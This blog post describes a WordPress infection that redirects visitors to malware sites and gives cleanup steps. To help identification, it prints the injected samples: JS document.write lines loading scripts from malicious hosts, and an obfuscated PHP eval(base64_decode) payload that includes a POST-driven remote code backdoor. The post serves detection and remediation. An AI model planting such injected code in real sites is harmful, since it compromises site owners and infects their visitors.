With my ear to the trends of the internet, I have seen several web site owners hijacked by a script that adds code to multiple filetypes in order to redirect the visitor to a malware site. The destination site, tallestbuildingslist(dot)com (DO NOT GO TO THAT SITE), can redirect users to other malware sites and has been reported by Google to install a trojan via an IE exploit (thus another reason to have Safari-based Google Chrome). The same can be found on other site addresses that can accompany the script (one such address is 202.143.140.50, a Thailand server noted as unsafe by Norton SafeWeb). Google has identified a trend on the IP block associated with Lunarpages, a web services company that controls the source IP of tallestbuildinglist.com. As of November 13, 889 sites on the Lunarpages (AS15244) IP network had hosted malicious code in their content over the previous 90 days (out of 6790 sites). 13% of your clients serving malware is a big concern in my book.

It is always concerning when you get hacked; your sense of security drops and you feel like someone is targeting you. In this case, the hack seems to be focused on WordPress. Of the people I’ve dealt with (in my regular job) who have been hacked, all of them have had WordPress blogs, and the pages with malicious code have been WordPress-specific files (wp-config.php, wp-config-sample.php, etc). The code is not in all PHP files but seems to also infect Javascript standalone snippets (JS files).

I have added an example of code added by the infection as an example of what you might see so you know for sure you have or have not been infected with this specific malware.

Here is a sample of what is written in .js files. This will almost always be at the bottom of the file, sometimes outside the comment brackets.

document.write('<script src=http://tallestbuildingslist.com/buildingimages/header.php ><\/script>');

document.write('<script src=http://202.143.140.50/eoffice/tello.php ><\/script>');

document.write('<script src=http://202.143.140.50/eoffice/tello.php ><\/script>');

PHP files are infected with a base64 code that is evaluated, part of the malware redirect or download (depending on the version of this malware). Example of base64 code:

<?php eval(base64_decode('aWYoIWlzc2V0KCRwdDB2ZTEpKXtmdW5jdGl
vbiBwdDB2ZSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC
4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzI
CR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdf
bWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXs
zMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpez
IwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2K
SYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYm
c3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGF
jZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZS
AoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJ
ywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNo
KCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGx
heVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKS
kkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nL
io/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9
YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDN
SaGJHeGxjM1JpZFdsc1pHbHVaM05zYVhOMExtTnZiUzlpZFdsc1pHbH
VaMmx0WVdkbGN5OW9aV0ZrWlhJdWNHaHdJRDQ4TDNOamNtbHdkRDQ9J
yksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19y
ZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWl
mKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdG
lvbiBwdDB2ZTIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkcHQwdmUxOyRzP
WFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRwdDB2ZTEpKWNhbGxf
dXNlcl9mdW5jKCRwdDB2ZTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9
iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT
0ncHQwdmUnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInK
WJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0
IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk
+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2
VuZF9jbGVhbigpO31vYl9zdGFydCgncHQwdmUnKTtmb3IoJGk9MDska
Txjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hv
ICRzWyRpXVsxXTt9fX0kcHQwdmVsPSgoJGE9QHNldF9lcnJvcl9oYW5
kbGVyKCdwdDB2ZTInKSkhPSdwdDB2ZTInKT8kYTowO2V2YWwoYmFzZT
Y0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php

/**

* The base configurations of the WordPress.

*

* This file has the following configurations: MySQL settings, Table Prefix,

* Secret Keys, WordPress Language, and ABSPATH. You can find more information by.....

(This is an example in the index.php file of WordPress)

The fix is not as easy as just removing the code. It can hide in other places like plugin files and linked javascript in plugins. Because of the complexity of WordPress file structure and includes, it is sometimes very difficult to remove this issue completely. If you miss one PHP file or one line of code, it could propagate the malware code again to other files.

Solution?

First, you need to be making backups routinely. If your hosting service does not have an auto-backup tool, and you are not using one of the many backup plugins for WordPress, you need to make a note for yourself to make a backup each month or, for larger sites, each week. Keep at least three on archive to make sure you have a stock of backups, in case the infection was included in one of your recent backups. If you are not making backups, don’t expect to keep all of your content.

To get rid of this infection, you first need to do a check on your computer. Scan with antivirus, anti-malware, anti-spyware and anti-hijack tools. I’d list a million of them that might work, but the best (and cheapest, in other words free) collection that has worked for me is as follows:

  • AVG Free – Antivirus
  • Spyware S&D – Spyware and malware prevention
  • Malwarebytes – thorough scan for malware
  • Regseeker – registry cleaner and checker

This little group has kept me virus free (virtually) for years. Run something like this to start with. Avoid your site until the rest has been done to clean out the infestation on your server.

  1. Change the password to your hosting account (not FTP, the account in which you have your control panel and settings, usually on your host’s web site).
  2. Verify you have a backup of files or at least the source files you need to make your site work.
  3. WordPress users must make sure the backup archive on your computer has the right database information in the wp-config file. If this is incorrect, your site will not work when uploaded again.
  4. If you need some custom code, open the file remotely (or use Filezilla’s edit feature) and copy that custom code to a fresh version of the file. If you do need to download the file to edit it, do not open it, just edit it in Notepad or a similar text editor. Once the code is copied, remove the file copied from your server.
  5. Remove all files from your server. Do not download them.
  6. Once all files are gone, upload fresh copies of the file.
  7. Change your FTP password for all users possibly tied to your FTP host.

This process should take at most an hour for most installations. Database is not affected by this situation, but should be backed up regularly as well. There is no need, as far as I can tell, to drop and then reinsert your database tables.

This is the same process you would take for most malware infestations. Sometimes you need to reload your database, but that is just an extra step in this process (somewhere between step 4 and step 5).

Note you will need to do this to all of your sites in your FTP server, especially if you have more than one WordPress installation. My suggestion is to make backups that can be saved on your computer, and for picky webmasters you may want to burn these onto a DVD-RW. I suggest this media rather than a thumb drive or other memory-based device because infected files on a DVD-RW can’t infect other files on the same media, whereas a thumb drive can have that vulnerability. It also allows you to remove old backups as needed.

Lunarpages is going to take a lot of heat if it can’t track down and kill this “drive-by-download” infestation on their network. It has already caused havoc on random WordPress sites. It won’t be long before another regulating body will need to step in. For the time being, however, I suggest being careful when signing up for hosting through Lunarpages or one of their resellers if you have WordPress.

Links used in this post: